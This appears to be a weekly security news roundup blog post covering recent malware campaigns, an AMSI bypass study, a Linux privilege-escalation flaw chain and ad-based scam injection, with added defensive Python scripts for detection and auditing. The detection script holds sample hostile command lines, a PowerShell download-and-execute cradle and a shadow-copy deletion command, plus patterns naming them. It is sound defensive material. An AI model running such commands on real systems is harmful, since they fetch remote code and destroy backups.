Welcome to another week of our security review. By the looks of it, the usual cyber threats, i.e. malware and vulnerabilities, will dominate this week’s review; they don’t look like they are going anywhere anytime soon. Also, for the first time in a while, we’ll cover an article about research in computer security. Then we’ll explore how scammers manage to show their phone numbers on the legitimate websites of top brands like Microsoft and HP.
Discord flaw lets hackers reuse expired invites in malware campaign
The lesson here is not to trust expired Discord invites. And if you find yourself in a Discord channel that asks you to copy, paste, and execute a command for “verification” purposes, don’t. I repeat: don’t listen to them.
So what happens if you ignore my advice? Here is what could happen to you:
The users are tricked into manually opening the Windows Run dialog and pasting a PowerShell command, which they had already copied to the clipboard for execution. Doing so triggers a multi-stage infection involving PowerShell downloaders, obfuscated C++ loaders, and VBScript files.
The final payloads are downloaded from the legitimate Bitbucket software collaboration and file hosting service, and include AsyncRAT, Skuld Stealer, and ChromeKatz.
Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
Threat actors will do anything to install malware on your device. In this instance, they are using a technique called JSFireTruck to redirect victims to a malicious Uniform Resource Locator (URL) that can serve threats including malware and exploits.
Here is what you can take away from the article:
“The campaign’s scale and stealth pose a significant threat,” the researchers said. “The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities.”
Anubis ransomware adds wiper to destroy files beyond recovery
In today’s digital world, what’s worse than losing your files to ransomware? Let me know in the comments section.
What else should I add? I believe the article title says it all. If it’s still not clear, here is a simple explanation: the ransomware steals your files, overwrites your copies with zeros and, of course, tells you to pay a ransom. It can also try (but may fail) to change your desktop wallpaper.
From the article (here “ransomware” refers to Anubis):
The ransomware removes Volume Shadow Copies and terminates processes and services that could interfere with the encryption process. The encryption system uses ECIES (Elliptic Curve Integrated Encryption Scheme), and the researchers noted implementation similarities to EvilByte and Prince ransomware.
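Two of the behaviours described in this week’s review are easy to watch for in process-creation telemetry: the ClickFix pattern from the Discord story (the Run dialog is hosted by explorer.exe, so a pasted command shows up as explorer.exe spawning PowerShell with a download-and-execute command line) and the shadow-copy deletion the Anubis write-up mentions. The following detection logic is an added example, not code from any of the articles or vendors covered; the event fields (image, parent_image, command_line) are an assumption modelled on Sysmon Event ID 1, and every sample event is constructed with placeholder hosts and paths.

```python
"""Added example: detection logic for two behaviours described in this week's
review, run over constructed process-creation events. Not code from any of the
articles or vendors covered. Assumptions: events carry image, parent_image and
command_line (modelled on Sysmon Event ID 1); all sample events are constructed."""
import re

# Rule 1: ClickFix-style execution. The Windows Run dialog is hosted by
# explorer.exe, so a pasted command shows up as explorer.exe spawning a
# script host whose command line contains a download-and-execute cradle.
CLICKFIX_PARENTS = {"explorer.exe"}
CLICKFIX_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b"
    r"|-e(nc\w*)?\b|\bhidden\b)",
    re.IGNORECASE,
)

# Rule 2: Volume Shadow Copy deletion, the pre-encryption cleanup the Anubis
# write-up describes (vssadmin and wmic are the two classic command lines).
SHADOW_DELETE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)",
    re.IGNORECASE,
)


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the names of all rules the event matches (empty list if none)."""
    hits = []
    image = _basename(event["image"])
    parent = _basename(event["parent_image"])
    cmd = event["command_line"]
    if parent in CLICKFIX_PARENTS and image in CLICKFIX_CHILDREN and DOWNLOAD_CRADLE.search(cmd):
        hits.append("clickfix_run_dialog_cradle")
    if SHADOW_DELETE.search(cmd):
        hits.append("shadow_copy_deletion")
    return hits


# Constructed sample events (not real telemetry; hosts are .invalid placeholders).
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify)"'},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"id": 3, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -c "iwr http://intranet.invalid/patch.ps1 -OutFile p.ps1"'},
    {"id": 4, "parent_image": r"C:\Users\victim\AppData\Local\Temp\loader.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "command_line": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"id": 5, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c dir"},
]


def scan(events):
    """Return (event id, matched rules) for every event that triggers a rule."""
    alerts = []
    for event in events:
        hits = classify(event)
        if hits:
            alerts.append((event["id"], hits))
    return alerts


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Event 3 is deliberately left unflagged: a download cradle launched by a service is worth a rule of its own, but it is not the Run-dialog pattern this rule is scoped to, and keeping the parent-process condition is what keeps the ClickFix rule quiet on ordinary administration scripts such as event 2.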
CrowdStrike Researchers Investigate the Threat of Patchless AMSI Bypass Attacks
Stunning research from CrowdStrike. If you’ve not read something like this before, I’ll caution you: it might make your head spin. Don’t worry, I am here to make it easy for you.
The article explores a novel, patchless AMSI bypass attack technique — dubbed VEH² — that allows adversaries to stealthily evade Windows’ Antimalware Scan Interface (AMSI). It teaches us that threat defense must keep pace with evolving adversary tradecraft.
Here is an important lesson from the article:
As threat actors continue developing sophisticated AMSI bypass techniques, Falcon’s behavior-based detection powered by advanced machine learning provides a robust defense. By focusing on suspicious behaviors, CrowdStrike maintains its position at the forefront of endpoint protection, continuously adapting to evolving adversary tradecraft.
New ClickFix Malware Variant ‘LightPerlGirl’ Targets Users in Stealthy Hack
This malware is a case of accidental discovery: the researchers found it when a corporate customer visited an infected travel site. At the end of the day, the final payload is Lumma Stealer, an infostealer. Please note that at the time of writing, the research is still ongoing.
Nonetheless, here is an excerpt from the article:
…the use of a compromised travel site would be attractive to individuals sufficiently wealthy to seek an expensive vacation (the Galapagos), and they would likely do so from home on their own PC. Such devices are not often protected by modern EDR – so the ClickFix use of LOLBINS would pass unseen.
New Linux udisks flaw lets attackers get root on major Linux distros
The flaws, tracked as CVE-2025-6018 (discovered in Pluggable Authentication Modules (PAM)) and CVE-2025-6019 (discovered in libblockdev), allow attackers to escalate privileges to root on a broad range of major Linux distributions. We can learn from the article that the flaws underscore, once again, how seemingly benign services and configurations such as udisks and PAM can combine into a powerful root exploit chain.
From the article:
While successfully abusing the two flaws as part of a “local-to-root” chain exploit can let attackers quickly gain root and completely take over a SUSE system, the libblockdev/udisks flaw is also extremely dangerous on its own.
“Although it nominally requires ‘allow_active’ privileges, udisks ships by default on almost all Linux distributions, so nearly any system is vulnerable.”
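The “allow_active” remark above is worth making concrete. In polkit, every privileged action ships with defaults for three situations, and an action whose <allow_active> default is “yes” can be invoked by any active local session with no authentication at all; those are the actions an administrator should know about when reviewing what udisks and similar services expose. The audit helper below is an added example, not code from the article, from Qualys, or from the udisks or polkit projects; the .policy XML layout is the standard polkit one, and the embedded sample is constructed with placeholder action ids.

```python
"""Added example: audit polkit action defaults. Not code from the article,
Qualys, udisks or polkit. Lists actions whose <allow_active> default is "yes",
i.e. actions any active local session can perform without authenticating.
The .policy XML layout is polkit's; the embedded sample is constructed and
its action ids are placeholders."""
import glob
import xml.etree.ElementTree as ET

# Constructed sample in polkit .policy layout (placeholder action ids).
SAMPLE_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<policyconfig>
  <action id="org.example.placeholder.filesystem-mount">
    <description>Mount a filesystem (constructed sample)</description>
    <defaults>
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>
  </action>
  <action id="org.example.placeholder.modify-device">
    <description>Modify a device (constructed sample)</description>
    <defaults>
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>auth_admin</allow_active>
    </defaults>
  </action>
  <action id="org.example.placeholder.no-defaults">
    <description>Action without a defaults block (constructed sample)</description>
  </action>
</policyconfig>
"""


def unauthenticated_active_actions(policy_xml):
    """Ids of actions whose allow_active default is 'yes' (no authentication)."""
    if isinstance(policy_xml, str):
        policy_xml = policy_xml.encode("utf-8")
    root = ET.fromstring(policy_xml)
    found = []
    for action in root.iter("action"):
        node = action.find("defaults/allow_active")
        if node is not None and (node.text or "").strip() == "yes":
            found.append(action.get("id"))
    return found


def audit_policy_dir(pattern="/usr/share/polkit-1/actions/*.policy"):
    """Map each .policy file on the host to its unauthenticated active actions."""
    results = {}
    for path in sorted(glob.glob(pattern)):
        with open(path, "rb") as fh:
            try:
                ids = unauthenticated_active_actions(fh.read())
            except ET.ParseError:
                continue  # skip unparsable files rather than abort the audit
        if ids:
            results[path] = ids
    return results


if __name__ == "__main__":
    print("sample:", unauthenticated_active_actions(SAMPLE_POLICY))
    for path, ids in audit_policy_dir().items():
        print(path)
        for action_id in ids:
            print("   ", action_id)
```

Run on a real host, the script only inventories; whether each listed action should really be available to an active session without a password is a policy decision for the administrator, and an entry in the list is not by itself a vulnerability.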
Address bar shows hp.com. Browser displays scammers’ malicious text anyway
You can steer clear of this threat by not clicking on sponsored links in search results. These are the search results marked “Sponsored” in the top-left corner of the result.
From the article:
The unknown actors behind the scam begin by buying Google ads that appear at the top of search results for Microsoft, Apple, HP, PayPal, Netflix, and other sites.
While Google displays only the scheme and host name of the site the ad links to (for instance, https://www.microsoft.com), the ad appends parameters to the path to the right of that address. When a target clicks on the ad, it opens a page on the official site. The appended parameters then inject fake phone numbers into the page the target sees.
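The mechanism the article describes, a legitimate host whose page reflects attacker-chosen query parameters, can be checked for in two ways: look at the landing URL itself for parameter values that read like a support lure, and compare the decoded parameter values with the fetched page to see which ones are reflected verbatim. The code below is an added example, not from the article; the sample URL and HTML are constructed, the Microsoft host is used only because the article names it, and the phone numbers are placeholders.

```python
"""Added example, not from the article: two checks for ad landing URLs of the
kind described above (legitimate host, query string reflected as a support
number). Sample URL and HTML are constructed; phone numbers are placeholders."""
import re
from urllib.parse import parse_qsl, urlsplit

# Digit runs with optional separators, 9+ digits overall (e.g. 000-000-0000).
PHONE_RE = re.compile(r"\+?\d[\d\-\s().]{7,}\d")
LURE_WORDS = ("call", "support", "helpline", "toll free", "phone")
MIN_REFLECT_LEN = 6  # ignore short values like "en" that occur everywhere


def suspicious_params(url):
    """(name, decoded value) for query parameters that look like a scam lure."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        lowered = value.lower()
        if PHONE_RE.search(value) or any(word in lowered for word in LURE_WORDS):
            findings.append((name, value))
    return findings


def reflected_params(url, page_html):
    """Names of query parameters whose decoded value appears verbatim in the page."""
    return [
        name
        for name, value in parse_qsl(urlsplit(url).query)
        if len(value) >= MIN_REFLECT_LEN and value in page_html
    ]


# Constructed samples: a lure URL, a benign URL, and the page each produces.
LURE_URL = "https://www.microsoft.com/en-us/?q=Call+Support+Now+000-000-0000"
BENIGN_URL = "https://www.microsoft.com/en-us/?utm_source=ads&lang=en"
LURE_PAGE = '<html lang="en"><h1>Results for "Call Support Now 000-000-0000"</h1></html>'
BENIGN_PAGE = '<html lang="en"><h1>Results</h1></html>'

if __name__ == "__main__":
    for url, page in ((LURE_URL, LURE_PAGE), (BENIGN_URL, BENIGN_PAGE)):
        print(url)
        print("  lure-like params:", suspicious_params(url))
        print("  reflected params:", reflected_params(url, page))
```

The first check works on the URL alone and suits ad-review or proxy logs; the second needs the rendered page and is the one that actually confirms reflection, which is the property that lets a scammer put text on a site they do not control.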
Credits
Cover photo by Debby Hudson on Unsplash.
That’s it for this week, and I’ll see you next time.